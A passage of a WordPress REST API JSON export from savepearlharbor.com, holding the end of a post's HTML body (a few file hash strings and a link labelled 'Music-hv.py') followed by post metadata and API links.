de51465cec3b469fa1f6cab087a47f71<\/p>\n

e0b2eaefe9e4e023e7314dff213fa535e3fb3274<\/p>\n

4c74b2d6f11f51c776c3d15c8cabc530653a57ed3dfd27b3804c81cc975311de<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-hv.py<\/a><\/p>\n

\u00a0<\/p>\n

edb374796f6fe20e3b62962811968142<\/p>\n

3d236f99d1f558e6bfc960733e3f46f5<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-465558","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/465558","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=465558"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/465558\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=465558"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=465558"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=465558"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}